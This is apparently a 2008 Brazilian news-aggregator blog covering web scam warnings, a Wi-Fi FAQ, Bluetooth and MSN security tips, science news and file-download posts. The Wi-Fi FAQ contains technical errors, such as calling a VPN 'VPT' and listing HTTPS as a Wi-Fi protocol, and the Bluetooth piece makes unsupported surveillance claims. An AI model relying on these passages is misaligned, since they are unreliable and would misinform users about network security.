quinta-feira, 31 de julho de 2008

Conheça seis novos golpes que circulam pela web

Novo vídeo do caso Nardoni
A reconstituição do assassinato de Isabella Nardoni feita em computador, exibida por programas de TV como o Fantástico, tem sido utilizada como isca para disseminar programas nocivos. Curiosos que clicam no link e baixam o que seria o vídeo recebem um spyware.

Mulher Melancia no YouTube
Mais uma da série “mulheres nuas em vídeo da Playboy”. Para atrair suas vítimas, os criminosos prometem um ensaio exclusivo da dançarina conhecida como Mulher Melancia disponível no YouTube. Ao clicar no link, o curioso internauta recebe uma mensagem dizendo que é preciso baixar o Flash Player para visualizar o arquivo. Basta clicar. Mas quem acredita baixa o programa nocivo identificado pela Trend Micro como MAL_BANLD1, destinado a roubar dados bancários.

Acidente grave com Fernando Alonso

Traz uma notícia (falsa) creditada ao jornal El País segundo a qual o piloto espanhol de Fórmula 1 teria sofrido um acidente em Bilbao. E mostra um vídeo do carro em chamas. Segundo a Panda Security, ao clicar no link para o tal vídeo é descarregado o cavalo-de-tróia Banker.LGC.

Estou te espionando...
Esta mensagem afirma que uma investigação sobre o destinatário do e-mail foi encomendada por uma pessoa. Só que ela não pagou pelo serviço. Por conta disso, os detetives resolveram vender o material levantado para você. Tudo mentira para convencê-lo ao clicar no link, que leva para um programa nocivo.

Declaração do IR suspensa

Fraudes usando o imposto de renda como atrativo não são novidade, mas há várias versões. A mais recente que recebi fala que a declaração do destinatário foi suspensa, de acordo com o “despacho em anexo”. Quem acha que caiu na malha fina e clica instala um programa espião.

Cancelamento de conta do Messenger
Depois de espalharem milhões de e-mails dizendo que contas do Windows Live Hotmail seriam canceladas se o internauta não clicasse em certos links, os criminosos da web investem em mensagens que prometem quase a mesma coisa, mas agora com o MSN Messenger. Mas o resultado é o mesmo: dados furtados de quem clica.

10 dúvidas e repostas sobre Wi-Fi

1 - Como funcionam as redes Wi-Fi?

O sistema de Wi-Fi se assemelha a um serviço de celular. Ele transmite o sinal através de duas antenas. Existem dois tipos de redes Wi-Fi. O primeiro é o modelo que está na orla de Copacabana, com sinal espalhado. A praia tem antenas espalhadas, a cada dois quilômetros de sua extensão, que enviam um sinal num raio de 360º.

Outro modelo é o "túnel virtual", ou VPT* (Virtual Private Network), muito utilizado por empresas que desejam montar uma rede para se interligar. Esse modelo é baseado na comunicação via antena entre dois pontos, não podendo ter obstáculo algum atrapalhando o sinal. Para evitar esse problema, as companhias instalam e apontam uma antena a outra em cada respectivo prédio.

*Virtual Private Network (VPT): rede privada, com criptografia bem maior. Uma letra pode virar até 128 caracteres. Pode gerenciar o nível de criptografia.

2 - Qual é o alcance das antenas?
Existem vários modelos de antenas, que conseguem atingir distâncias diferentes. Uma antena normal cobre cerca de 5 a 10 quilômetros, uma apontando para a outra. Outras antenas, mais potentes, chegam a atingir 30 a 40 quilômetros.

3 - Quais as diferenças de velocidade e freqüência entre as redes 802.11 A, B, G e N?
Um roteador básico Wi-Fi permite cobertura aproximada de 45 metros em ambiente interno e 90 metros em área externa. É possível também criar redes de múltiplos pontos para garantir uma área de cobertura maior.

4 - Em que protocolos de segurança o Wi-Fi funciona
Em vários protocolos, como: HTTPS (Hyper Text Transfer Protocol Secure), VPN (Virtual Private Network), WEP (Wired Equivalent Privacy), TKIP (Temporary Key Integrity Protocol) e o WPA (WI-FI Protected Access), SSL (Secure Sockets Layer). Dentre eles o mais utilizado hoje é o WPA que substituiu o WEP e possui mais segurança.

O protocolo normal de navegação é o HTTP (Protocolo de Transferência de Hipertexto, Hyper Text Transfer Protocol, em inglês), sendo muito comum na internet. Apesar de ser conhecido no mundo inteiro, ainda oferece proteção. Muitos sites de banco o utilizam em seu sistema de segurança, usando, por exemplo, um 'S' no HTTP (tornando-se HTTPS), que criptografa as senhas dos clientes.

Segundo Orácio Kuradomi, "Não quer dizer que o usuário fique 100% seguro o utilizando, mas serve como uma espécie de alarme. É até possível roubar os dados, mas é bem difícil".

O WEP (Wired Equivalent Privacy) é exclusivamente Wi-Fi, e foi criado para dar mais segurança no processo de autenticação e proteção nos dados dos usuários de redes sem fio. Mas por já ser muito utilizado, está cada vez mais vulnerável a ataques. "Tem gente que o quebra em menos de um minuto", aponta Kuradomi.

O protocolo de segurança mais recente, desenvolvido em 2003, é o WPA (Wi-Fi Protected Access), que em termos de proteção é superior aos anteriores, com melhorias na criptografia dos dados e na autenticação dos usuários. De acordo com especialistas, este protocolo tem grande potencial para dominar o setor.

5 - O que um notebook precisa para ter suporte em redes Wi-Fi?
O laptop precisa ter uma placa que tenha wireless, ou será preciso comprar um adaptador que forneça a rede Wi-Fi. Ele pode ser instalado via USB. O adaptador USB WI-FI wireless LAN para PSP, DS WII, NOTEBOOK E PDA'S tem um custo médio de R$100.

6 - Eu preciso de provedores para acessar redes Wi-Fi abertas ou públicas?
Isso varia de rede em rede. A orla de Copacabana, por exemplo, não requisita um provedor. No entanto há um porém, segundo Kuradomi. De acordo com o especialista, o link da Orla Digital precisará ser muito potente para aguentar a quantidade de acessos e de informação baixada, como vídeos. O consultor também notifica que será providenciado um portal para cadastro de usuários da rede, e provavelmente algum sistema para limitar o tempo de acesso.

7 - É perigoso acessar uma rede aberta?
Isso vai depender se o usuário adotar certos cuidados na hora de acessá-la, no desktop ou laptop. Para se conectar a alguma rede Wi-Fi, o sistema operacional precisa estar sempre atualizado. É recomendável ter antivírus, firewall e anti-spyware, além de criar uma senha longa e segura, com números e letrar, e trocá-la esporadicamente. "Muitos hackers disponibilizam um sinal só com vírus. É um ataque ao inverso. Liberando o sistema gratuitamente, depois eles podem atacar e monitorar tudo", avisa Kuradomi.

Os fornecedores de hotspots também precisam tomar cuidado. Caso alguém acesse a rede e cometa algum crime virtual, como entrar em sites de pedofilia, quem responde criminalmente a ação é o dono do link. Para evitar esse problema, é aconselhável criar um sistema de autenticação do usuário. "Isso é lei. Os provedores de internet também são obrigados a guardar todos os logs em até três anos", aponta o consultor.

8 - Meus dados podem ser roubados numa conexão Wi-Fi?
Isso depende do nível de segurança do servidor. O banco utiliza o HTTPS, por exemplo. Após interceptar na conexão os dados, algum invasor pode quebrar o protocolo e decifrar as informações criptografadas recebidas. Isso pode acontecer em casos de ataques feitos por hackers mais experientes.

9 - Que erros podem ser encontrados em redes Wi-Fi de uma empresa?
As companhias compram um Access Point (roteador sem fio) e o instalam. Ok. Mas o que muitas deixam de fazer é configurar um sistema de autenticação via senha, e habilitar a criptografia do ponto. Isso evita que alguém que conheça a senha entre tranquilamente na configuração do hotspot e altere todos os dados, podendo até tirar a empresa da rede.

10 - O que é a rede Wi-Max?
A rede Wi-Max pode ser considerada uma evolução do Wi-Fi, tecnicamente. Seu padrão de comunicação é o protocolo 802.16, e atinge uma área de cobertura que chega a um raio de 50 quilômetros, com velocidade de até 70 Mbps.

Com o Wi-Max móvel, será possível fazer downloads no celular e assistir à televisão em tempo real via banda larga em trânsito, sem perder a conexão.

Saiba como reforçar a segurança do Bluetooth para evitar espionagem no celular

Os sinais de radiofreqüência de curto alcance do Bluetooth foram usados para espionar o comportamento de 3 mil habitantes da cidade inglesa, chamada Bath. Os pesquisadores da universidade dessa localidade espalharam leitores da frequência de rádio por pubs, ruas, escritórios, sem a autorização das pessoas, com a intenção de formar um banco de dados, com nome, endereço de e-mail e números de telefone, obtidos a partir da invasão no aparelho móvel.

Essa ação foi apenas um ponto de partida. Batizado de Cityware, o sofware do projeto foi colocado na internet para download público. Agora, cerca de 250 mil usuários de Bluetooth no mundo inteiro estão sendo vigiados pelos leitores do programa da instituição inglesa.

Como a internet não tem fronteiras, você pode ser um dos vigiados pelo projeto Cityware.org.uk. Para não ficar refém da tecnologia, saiba que é possível bloquear o seu Bluetooth.

O que é Bluetooth?

O Bluetooth é um protocolo de comunicação que se tornou essencial nos equipamentos portáteis de hoje em dia devido à facilidade com que se consegue transmitir dados sem a necessidade de fios. Para tal, basta que o outro aparelho tenha a mesma tecnologia.

O Bluetooth possibilita a troca de arquivos por meio de freqüência de rádio de curto alcance, por isso, os aparelhos devem ser colocados próximos para que haja troca que informações, por exemplo, é possível operar um computador com um teclado wireless ou usar um headset para falar no celular.

Ameaças

No entanto, ao habilitar o seu aparelho para esse tipo de comunicação sem fios, saiba que está abrindo uma porta de entrada para ataques, invasões, entre outros. Portanto, antes de usá-la, é importante entender o que é, os riscos de segurança e como se proteger.

Os invasores podem entrar em um equipamento com Bluetooth no momento que a tecnologia é ativada. Uma vez dentro do aparelho, existem diversas formas de causar danos ao usuário, entre elas, enviar mensagens não-solicitadas, fazer gastos em seu nome, corromper dados contidos no aparelho.

Um ação invasiva desse tipo o "bluesnarfing", que, nada mais é do que o furto de informações de um dispositivo para outro. Essa Dessa maneira, vírus e códigos maliciosos também podem infectar as máquinas. Por isso, é preciso tomar muito cuidado ao aceitar uma conexão com um dispositivo desconhecido.

Como se proteger

É aconselhável desligar o Bluetooh quando ele não está em uso - a não ser que informações estejam sendo transferidas para outro aparelho. Caso contrário, é preciso desabilitar a tecnologia, prevenindo o acesso de pessoas não-autorizadas.

Após deixar o aparelho no modo "discoverable", para que haja o reconhecimento entre os equipamentos que vão se conectar, é possível habilitar o Bluetooth no modo "hidden", para deixá-lo escondido ou camuflado. Isso previne que outros dispositivos com a mesma tecnologia reconheçam o dispositivo.

Não se deve ativar o Bluetooth em qualquer ambiente. Procure evitar deixar o Blutooth ativado por muito tempo em locais públicos, onde não se sabe quem está presente e suas intenções.

Outra maniera de reforçar a segurança do aparelho é examinar as opções que o aparelho oferece para trocas de informações. Basta definir os requerimentos para o Bluetooth aceitar somente as conexões desejadas. Ao selecionar as preferências, é possível reduzir os riscos de invasão.

Fonte: UOL

Dicas simples mostram como remover vírus do MSN

Se a curiosidade para ver as fotos do ex-namorado ou saber quem lhe bloqueou no comunicador instantâneo foi maior do que a preocupação em proteger seu bate-papo, o jeito é "arregaçar as mangas" e se preparar para uma maratona para remover as pragas que tomaram conta do seu PC.

De acordo com Gabriel Menegatti, diretor da empresa de segurança F-Secure, o primeiro passo para eliminar pragas de comunicadores instantâneos é colocar o antivírus para rodar. "Escolha um bom programa para fazer uma varredura por todo o sistema. O antivírus deve ser capaz de localizar e excluir o vírus que contaminou o mensageiro", explica. Também é possível fazer a verificação com programas online.

Confira uma lista de 10 antivírus online

Os antivírus atuais já trazem a função de firewall e antisypware. Se o seu programa ainda não tem essas soluções, instale-as em seu PC e faça outra varredura no sistema.

Veja lista de firewalls

Veja lista de antispyware

A maioria dos vírus para mensageiros é eliminada assim que esses passos são executados.

Mas, se por acaso, o seu comunicador ainda estiver contaminado, Menegatti aconselha desinstalar o programa e repassar a solução de antivírus no PC. Cheque spywares e trojans e só depois volte a instalar o software (de preferência, a versão mais atualizada).

Se o programa escolhido for o Windows Live Messenger, reforce a segurança obrigando-o a checar todos os arquivos enviados pelos seus contatos antes de recebê-los. Para isso, vá em Ferramentas (Tools) > Opções (Options) > Transferência de Arquivo (File Transfer) e escolha qual antivírus será responsável pela varredura.

Poucos são os casos em que, mesmo cumprindo todas as etapas para a remoção do vírus, a praga permanece no sistema. Antes de excluir sua conta, entre em contato com o suporte técnico do desenvolvedor.

Lembre-se também de enviar uma mensagem para os seus contatos avisando que o seu computador foi infectado e alertando que o seu "perfil" está mandando links para download que, na verdade, são vírus. Isso ajuda a "estancar" a infestação da praga, enquanto você resolve o problema com seu PC.

VEJA ALGUNS VÍRUS PARA COMUNICADORES INSTANTÂNEOS

Bropia.F: Enviado por uma mensagem intitulada "sexy.jpg", o vírus coleta informações do sistema, inclusive as digitadas, e envia spams

MSNDiablo: Sob um falso link de uma animação envolvendo o presidente norte-americano George W. Bush, o vírus é instalado no computador e realiza alterações na configuração do sistema

Hakaglan: Worm se espalha via Yahoo! Messenger, Windows Live Messenger, drives removíveis ou redes. Da mesma maneira que o MSNDiablo, o Hakaglan executa alterações nas configurações do sistema

Culler: Worm que se espalha pelo Messenger, copia arquivos executáveis na pasta de sistemas do Widows e modifica alguns registros

Sonda especial "Phoenix" confirma a existência de água em Marte

"Temos água", disse o cientista William Boynton, da Universidade do Arizona, durante conferência televisionada pela Nasa, ao se referir aos resultados de testes químicos realizados quando um instrumento da sonda Phoenix analisou os vapores emitidos por uma amostra de solo marciano. Até agora, as evidências da presença de água em Marte tinham sido indiretas, como a sublimação de pedras de gelo, capturada pela câmera da Phoenix.

O resultado foi obtido por um instrumento da Phoenix, o analisador térmico de gás, ou Tega, que vinha experimentando uma série de problemas, incluindo um curto-circuito que ameaçava inutilizá-lo.

Ao anunciar a primeira confirmação química da presença de água em Marte, os representantes da Nasa também afirmaram que a missão da Phoenix, prevista para se encerrar no final de agosto, será prorrogada até 30 de setembro. De acordo com nota da agência espacial, a sonda está em "boa forma".

Os cientistas ad Nasa dizem que, agora que a questão da água está resolvida, a Phoenix passará a buscar sinais de habitalibilidade, tentando determinar se a região ártica de Marte, onde a sonda se encontra, é ou já foi capaz de abrigar vida. Resultados anteriores já mostraram que o solo próximo à Phoenix é alcalino e contém nutrientes minerais, como sódio e potássio, mas nenhum sinal de matéria orgânica foi detectado ainda.

Fonte: Estadão.com

Eclipse do Sol será observado por 1 bilhão de pessoas

O eclipse total do Sol, o quinto do século XXI, escurecerá a China na próxima sexta-feira, a uma semana da inauguração dos Jogos Olímpicos de Pequim, segundo o Instituto de Mecânica Espacial e Cálculo de Efemérides (IMCCE) de Paris.

Esse eclipse será visível por 1 bilhão de pessoas em seu percurso do "nordeste do Canadá (9h30 GMT/6h30 de Brasília), passando pelo noroeste da Groenlândia, oceano glacial Ártico, norte siberiano e o oeste da Mongólia", até ser concluído na China (11h20 GMT/8h20 de Brasília), de acordo com o site do IMCCE.

Os eclipses ocorrem com o alinhamento de Sol, Lua e Terra. O Sol é 400 vezes maior do que a Lua, mas também está 400 vezes mais distante: quando a Lua bloqueia por completo a luz solar, ocorre o eclipse total.

Nesta sexta-feira (01/08/2008), o eclipse total terá no máximo 2 minutos e 27 segundos, às 10h21 GMT (7h21 de Brasília), no norte da Rússia.

Em média, esse fenômeno ocorre a cada 18 meses, mas a maior parte só é possível ver sobre o mar, ou regiões pouco habitadas.

Peter So, eminente astrólogo chinês e especialista em Feng Shui, garantiu que o eclipse total não vai perturbar as Olimpíadas.

"Os eclipses solares sempre foram associados a catástrofes, ou à infelicidade. Não existe, porém, nenhuma base científica para essa crença", afirmou.

"Entretanto, parte dos acontecimentos pós-eclipse pode se explicada pelo impacto psicológico do fenômeno sobre as pessoas", ponderou.

TUTORIAL: Tire seu nome do SPC e SERASA em no máximo 10 dias

Nome do Lançamento: Limpe seu nome em dez dias
Tamanho: 1MB
Links: Homepage
Download: Multi-Servidor

CURSOS: Análise e Planejamento Financeiro

Nome do Lançamento: SEBRAE: Análise e Planejamento Financeiro
Tamanho: 1MB
Links: Homepage
Download: Multi-Servidor

Eleições 2008: Band faz 1º debate entre os candidatos de SP hoje


Encontro será transmitido também pelo Bandnews TV, Rádio Bandeirantes e Bandnews FM.

A Band repete a tradição e novamente abre a temporada dos debates eleitorais na televisão. O encontro entre os candidatos está marcado para esta quinta-feira, a partir das 21h30, na sede da emissora, no Morumbi. Oito candidatos participam: Gilberto Kassab (DEM), Paulo Maluf (PP), Marta Suplicy (PT), Renato Reichmann (PMN), Ciro Moura (PTC), Geraldo Alckmin (PSDB), Ivan Valente (PSOL) e Soninha Francine (PPS).

Mediado por Boris Casoy, o debate será dividido em cinco blocos. No primeiro bloco cada candidato responde a uma mesma pergunta feita pela produção (resposta de 1 minuto). No segundo e terceiro blocos candidato pergunta para candidato (pergunta 30 segundos e resposta de 1 minuto e meio. Réplica de 1 minuto e tréplica de 1 minuto). No quarto bloco, os jornalistas do Grupo Bandeirantes José Paulo de Andrade e Fernando Vieira de Mello perguntam aos candidatos de acordo com sorteio prévio e escolhem o candidato que comentará a resposta (pergunta 30 segundos e resposta de 1 minuto e meio. Comentário de 1 minuto e réplica de 1 minuto). No quinto bloco, cada candidato terá direito a um minuto e meio para as considerações finais: "As regras do debate proporcionam um intenso confronto de idéias, mas não acredito em ataques pessoais. Os candidatos entenderam que o eleitor está mais racional, menos emocional. Por isso espero um debate voltado à apresentação de soluções dos problemas da cidade", afirma Fernando Mitre, diretor nacional de jornalismo. Mesmo assim, em caso de ofensas pessoais, as regras prevêem a concessão do direito de resposta.

Quinze câmeras serão posicionadas - no pátio da emissora e no interior do estúdio - para registrar toda a movimentação ao vivo. Uma das câmeras será instalada num helicóptero para mostrar do alto a chegada dos candidatos. Durante a transmissão será utilizado o recurso da "tela dividida", que colocará em cena ao mesmo tempo o candidato que faz a pergunta e aquele que dá a resposta. "Isso é importante para que o telespectador não perca nenhuma reação dos candidatos", afirma Mitre.

Além de Band e Bandnews (canal por assinatura) a Rádio Bandeirantes (AM 840 / FM 90,9), Bandnews FM (96,9) e o site da Band (www.band.com.br) também fazem a transmissão ao vivo.

No mesmo dia e horário (31 de julho, 21h30 horas) a Band realiza debates em cinco capitais: Curitiba, Belo Horizonte, Salvador, Porto Alegre e Manaus. Candidatos de São José dos Campos debatem na Band Vale, candidatos de Araras debatem na Band Campinas, candidatos de Chapecó estarão na TV Barriga Verde (Santa Catarina), candidatos de Niterói debatem na Band Rio. As emissoras de Barra Mansa e Maringá farão debates com os candidatos locais.

Microscópio sem lentes é do tamanho de uma moeda

Cientistas do Instituto de Tecnologia da Califórnia, nos EUA, desenvolveram um microscópio ultracompacto de alta-resolução, com tamanho comparável ao de uma moeda, mas com capacidade equivalente à das grandes máquinas de laboratório. Ele usa apenas a luz do sol como iluminação e poderia ser acoplado até mesmo a um celular.

O “microscópio microscópico” opera sem lentes, combinando a tradicional tecnologia de chips de computador com a canalização de fluidos em escalas muito pequenas, segundo seu criador, Changhuei Yang.

O microscópio poderia ser acoplado a celulares, por exemplo

O aparelho todo é do tamanho de uma moeda de US$ 0,25, incluindo os tubos de análise de fluidos, enquanto o chip em si corresponde ao nariz da imagem de George Washington impressa na moeda. É este chip que capta imagens.

O objetivo de desenvolver o dispositivo seria a necessidade de alterar a forma como se vê o microscópio, presente nas ciências desde o século XVI. A intenção da equipe de pesquisadores é mudar o padrão do uso de lentes e permitir a criação de aparelhos incrivelmente menores do que os atuais.

Os desenvolvedores, segundo o site Engadget, enxergam a aplicação da invenção em pesquisas de campo, principalmente em países menos desenvolvidos.

Acoplado a celulares, o microscópio poderia ser usado para estudar amostras de sangue, no diagnóstico de doenças como a malária, ou na análise de água, procurando por sinais de giárdia ou outras patologias.

Yang acredita que o dispositivo possa ser produzido em larga escala por um valor aproximado de US$ 10 (R$ 15) por unidade, segundo o site Physorg.

Quanto à real utilização do chip no mercado, o cientista diz que tem conversado com empresas de biotecnologia a fim de conseguir parcerias. Nenhuma, entretanto, foi acertada ainda.

Fonte: Terra

Brasil está desenvolvendo trem que levita sobre trilhos magnéticos

A roda vai ficar no passado com a chegada da levitação magnética para veículos. A aposta do professor Richard Stephan, da Coordenação de Programas de Pós-Graduação de Engenharia da Universidade Federal do Rio de Janeiro (Coppe/UFRJ) tem um motivo: ele é o coordenador do projeto do primeiro trem desse tipo desenvolvido no Brasil, o Maglev-Cobra.

Trilhos magnéticos

A idéia é substituir trilhos convencionais por "trilhos de ímãs" para transporte urbano de passageiros, a uma velocidade média de 70 quilômetros por hora, semelhante à dos metrôs.

"É uma levitação que é possível obter usando ímãs e supercondutores, efeito conhecido como diamagnetismo. Dentro dessa possibilidade se evita a necessidade de rodas e trilhos; é mais parecido com um avião do que com metrô", detalha o professor.

Vantagens do trem magnético

O veículo, segundo Stephan, tem vantagens comparativas de implantação, custos operacionais e gasto energético em relação a um sistema convencional de metrô sobre trilhos. "Uma das vantagens é que as obras de construção civil vão ser mais baratas. As obras de construção civil representam o maior custo na implantação de qualquer transporte urbano. Estimamos que o custo pode ser reduzido a um terço do valor de um metrô subterrâneo", compara.

"Além disso, enquanto a relação entre energia necessária para movimentar um passageiro por um quilômetro é de 2,8 mil quilojoules para um carro e até 4,2 mil para um avião, é de 25 no Maglev", compara o professor.

Mini-vagões

O trem será composto de módulos de um metro de cumprimento - com capacidade para oito passageiros cada -, que, articulados, dão ao veículo formato semelhante ao de uma cobra. A estrutura também permite que o veículo faça curvas de 30 metros de raio, enquanto os trens convencionais precisam de pelo menos 150 metros, o que demanda mais custo e espaço disponível para implantação.

O Maglev-Cobra deve ganhar uma linha de testes de 114 metros dentro do campus da UFRJ. A construção do projeto depende do financiamento de cerca de R$5 milhões, que o pesquisador pediu ao Banco Nacional de Desenvolvimento Econômico e Social (BNDES). "Esse valor é quatro mil vezes menos que o Brasil gasta por ano com acidentes rodoviários", compara.

Impulsionando tecnologias

Até 2010, a meta é instalar uma linha de três quilômetros de trilhos de imã para o Maglev-Cobra dentro da Cidade Universitária da UFRJ, entre o hospital e reitoria. A linha serviria de início para o ambicioso projeto de ligar o Aeroporto do Galeão à Praça da Cinelândia no centro do Rio de Janeiro. "Como o veículo é silencioso, vai poder ser colocado em vias elevadas, ou margeando rios, canais, em canteiros centrais e isso vai baratear a obra", calcula.

"Além de transportar pessoas, a idéia é impulsionar tecnologias. O paradigma de transporte público no Brasil ainda é o metrô. Estamos propondo um modelo para o século 21", conclui Stephan.

Fonte: Inovação Tecnológica

Nova cerâmica para louças economiza 50% da energia dos microondas

Os fornos de microondas mostraram-se práticos o suficiente para cair no gosto das donas de casa do mundo inteiro. E eles poderiam ser ainda melhores, caso o material das louças que vão em seu interior fossem mais eficientes.

Cerâmica que absorve microondas

E isto logo poderá se tornar uma realidade, graças a uma nova cerâmica que possui a capacidade de absorver as microondas. As principais vantagens da nova cerâmica serão comidas quentes por igual, aquecimento mais rápido e, principalmente, uma conta de energia menor no final do mês.

Como os microondas aquecem a comida

Para aquecer os alimentos, as microondas fazem com que qualquer molécula que tenha uma carga positiva em uma extremidade e uma carga negativa na outra extremidade - como a água - gire para alinhar-se com o campo elétrico alternado das microondas.

Essa rotação induzida das moléculas de água empurra as moléculas vizinhas, que também se movem, criando uma agitação geral. Esse movimento generalizado das moléculas é sentido na forma do aumento do calor da comida.

Perda de calor por indução

Mas as louças para microondas são transparentes às microondas e somente se aquecem por indução, pelo contato direto com a comida quente. Isso significa que uma parte do calor da comida é perdido para a louça, retardando o processo de aquecimento e desperdiçando energia.

Os pesquisadores agora resolveram este problema, criando uma cerâmica especial que absorve as microondas. A pesquisa foi feita por Sridhar Komarneni (Universidade de Pensilvânia, Estados Unidos), Hiroaki Katsuki e Nobuaki Kamochi (Universidade de Saga, Japão).

Petalita

O componente básico da nova cerâmica é um mineral rico em lítio, chamado petalita, ao qual foram adicionadas pequenas quantidades de óxido de ferro magnético.

O óxido de ferro interage com o campo elétrico das microondas e se aquece rapidamente, enquanto a petalita, que é isolante, ajuda a reter aquele calor depois que o forno é desligado. A cerâmica também ganha calor diretamente, que não mais é retirado da comida.

"A nova louça para microondas economiza 50% de energia em comparação com as louças convencionais para microondas," diz Komarneni. Uma panela para cozinhar arroz, feita com a nova cerâmica, leva apenas 10 minutos para preparar a comida, um tempo que fica entre 20 e 30 minutos com as cerâmicas convencionais.

Fonte: Inovação Tecnológica

Call centers: entenda as novas regras para o atendimento telefônico

“Aguarde um instante, sua ligação é muito importante para nós”. Se você está cansado de ouvir esta gravação fatídica, sua vida está prestes a mudar para melhor. O presidente Luis Inácio Lula da Silva deve assinar nesta quinta-feira (31/07) um decreto que estabelece novas regras para o Serviço de Atendimento ao Consumidor (SAC).

Entre as mudanças está a exigência de que o cliente tenha a opção de falar com um atendente e cancelar serviços entre as primeiras alternativas do menu eletrônico e de que o usuário não tenha mais que digitar dados - como número de conta, CPF ou RG - para ser atendido.

O regulamento propõe ainda que todo call center ofereça atendimento 24 horas por dia, sete dias por semana e estabelece o prazo de cinco dias para a resolução dos problemas levados ao SAC.

O objetivo da regulamentação, proposta pelo Departamento de Proteção e Defesa do Consumidor, órgão do Ministério da Justiça, é melhorar o atendimento aos usuários de call centers. “O serviço de atendimento é líder em reclamações. Há anos as empresas deixam a dever”, opina Maria Inês Dolci, advogada da Fundação Pro Teste.

A partir da assinatura do decreto pelo presidente Lula, as empresas de tele-atendimento terão 120 dias para se adequar às normas. “Os representantes da categoria já sabiam o que seria proposto pelo menos desde abril deste ano, portanto tiveram tempo para se preparar”, afirma Andréa Sanchez, diretora de programas especiais do Procon São Paulo.

Porém, segundo Diogo Morales, presidente do Sindicato Paulista das Empresas de Telemarketing, Marketing Direto e Conexos, o prazo é proibitivo para algumas empresas do setor. “Será difícil para algumas empresas, especialmente aquelas com estrutura menos formal, se adequar às exigências”, ele defende.

De acordo com Morales, o setor terá que investir em qualificação dos atendentes, aumentar os quadros de funcionários e modificar os sistemas informatizados de atendimento para cumprir as novas regras. “A nova norma vai exigir investimentos e a contratação de pessoas”, concorda Claudio Tartarini, assessor jurídico da Associação Brasileira de Telesserviços (ABT). “Mas é um processo de profissionalização positivo para o mercado”, ele acrescenta.

As empresas que não se adequarem à normas após o prazo determinado, estarão sujeitas a multa de até 3 milhões de reais, prevista no Código de Defesa do Consumidor.

O texto final do decreto será conhecido nesta quinta-feira, mas algumas alterações já foram feitas, como a remoção do prazo máximo de 60 segundos de espera para o atendimento.

Confira as principais mudanças previstas na regulamentação:

> O usuário deve ter no primeiro menu eletrônico a opção de contato direto com o atendente;

> As opções de reclamação e cancelamento devem estar entre as primeiras alternativas do menu;

> O usuário não será obrigado a fornecer dados - como o número da conta ou o CPF - antes de falar com um atendente;

> O serviço de atendimento deve estar disponível 24 horas por dia, sete dias por semana, sem interrupção;

> O número de atendimento deve ser único (mesmo que o grupo preste diferentes serviços) e deve ser informado no momento da contratação do serviço;

> O sistema de atendimento informatizado deve dar acesso ao histórico de atendimento do cliente;

> É proibida a repetição verbal ou digital de dados do consumidor;

> A alteração no contrato assim como seu cancelamento poderão ser feitos pelo mesmo canal que a contratação do serviço;

> O consumidor deverá ter acesso ao seu histórico de atendimento em até 72 horas, se assim solicitar;

> Os registros dos contatos do cliente com o SAC devem ser mantidos por dois anos;

> Pedidos de informações devem ser atendidos imediatamente;

> O cancelamento deve ser feito imediatamente após a solicitação;

> As reclamações devem ser resolvidas em no máximo cinco dias úteis;

> A implementação das novas normas não deve ter ônus ao consumidor.

Fonte: IDG Now!

YouTube pagará a usuários brasileiros que postarem vídeos de sucesso

O Google anunciou nesta quarta-feira (30) um programa que permitirá que usuários brasileiros do YouTube passem a ser pagos caso postem vídeos que recebam grande número de acessos e atraiam publicidade de anunciantes.

A extensão do programa YouTube Partners a usuários do Brasil e da Espanha foi anunciada na Campus Party, um encontro do qual participaram cinco mil internautas em Valência, na Espanha, pelo responsável de conteúdos do YouTube Espanha, Javier Alonso.

O YouTube Partners já funciona em países como Estados Unidos, Alemanha e Japão.

Poderão aderir ao programa os usuários que postarem vídeos pelo menos uma vez por semana e que ocupem também os primeiros lugares na classificação dos mais vistos ou que contenham “muitos assinantes”.

Um dos requisitos imprescindíveis é que o conteúdo do vídeo seja integralmente produzido pelo autor, ou seja, que não utilize música ou imagens de outros artistas, a menos que disponha dos direitos pertinentes.

O YouTube não especificou nem o percentual nem o valor que os usuários receberão, embora Alonso tenha ressaltado que estes “recebem mais da metade” do que o anunciante paga, e que os autores de vídeos mais vistos do mundo já receberam “milhares de dólares ao mês”.

Fonte: G1

quarta-feira, 30 de julho de 2008

Comics: Justice Society of America Annual 01

Nome do Lançamento: Justice Society of America Annual 01
Tamanho: 29MB
Links: Homepage
Download: Multi-Servidor

Fabricante apresenta câmera digital com 14,7 megapixels

A Panasonic apresentou, nesta quarta-feira (30), uma câmera digital com 14,7 megapixels – de tão alta, a resolução está sendo chamada de “absurda” por blogs de tecnologia estrangeiros. Ela tem zoom óptico de 3,6 x, lentes Leica DC Vario-Elmarit de 28 mm e também grava vídeos.

Será lançada em agosto no Japão, onde foi apresentada, por US$ 400. Câmeras com resolução de 14 megapixels já existem no mercado, mas ainda são raras.

Câmera tem resolução de 14,7 megapixels. (Foto: Divulgação )

Lumix FX150, da Panasonic, será lançada no Japão em agosto. (Foto: Divulgação )

Fonte: G1

FolhaInvest: Participe do simulado e conheça o mercado de ações na prática

Pensando em atender cada vez melhor os participantes do Folhainvest, a BOVESPA e a Folha de S.Paulo reformularam o simulado em 2008, com o objetivo de melhorar a sua performance e oferecer uma ferramenta de simulação mais próxima do mercado de ações.

Premiação

Além de aprender e desenvolver habilidades do Mercado de Ações, você ainda pode ganhar prêmios. Veja o que os melhores colocados no simulado FolhaInvest ganham:

1º Lugar do ano
Pacote turístico de uma semana, com direito a acompanhante, para o Complexo Hoteleiro de Costa Sauípe (Bahia - Brasil), (fornecido pela Fator) e 3 meses grátis do sistema Enfoque Cotações Tempo Diferido (fornecido pela Enfoque).

1º Lugar do mês
Passagem de ida e volta para qualquer cidade brasileira atendida pela TAM (fornecido pela TAM) e uma assinatura de 3 (três) meses do sistema Enfoque Cotações Tempo Diferido (fornecido pela Enfoque).

1º ao 100º Lugar do mês
Seminário sobre "A Estrutura do Mercado de Ações" (fornecido pela BOVESPA).

1º Lugar do ano por região
Uma passagem de ida e volta SP*, um pernoite* e um curso relacionado ao mercado de ações (fornecidos pela BOVESPA), e uma assinatura de 3 (três) meses do sistema Enfoque Cotações Tempo Diferido (fornecido pela Enfoque).

*À exceção dos premiados que residem na cidade de São Paulo.

A coordenação do “FolhaInvest” poderá à seu critério conceder prêmios às classificações Universitária Anual e Feminina Anual.


Regulamento do Simulado FolhaInvest.
Manual do Simulado FolhaInvest.

Como participar

Para participar do FolhaInvest você deve acessar o site do simulado e se cadastrar, fornecendo alguns dados. A partir disso, você já pode testar seus conhecimentos investindo em ações.

Acesse o Simulado FolhaInvest.Clique aqui

Fonte: Bovespa

LEDs orgânicos ganham 60% em eficiência e se aproximam da comercialização

